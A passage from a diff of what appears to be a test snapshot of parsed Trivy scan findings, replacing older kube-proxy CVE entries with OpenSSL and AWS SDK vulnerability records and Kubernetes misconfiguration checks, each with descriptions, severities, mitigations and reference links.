"https://ubuntu.com/security/notices/USN-5329-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20193", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6119-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libssl3", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", + "fixedVersion": undefined, + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", ], }, "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": undefined, + "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://avd.aquasec.com/nvd/cve-2020-8912", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://access.redhat.com/security/cve/CVE-2020-8912", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", + ], + }, + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.cpu')", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.memory')", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to 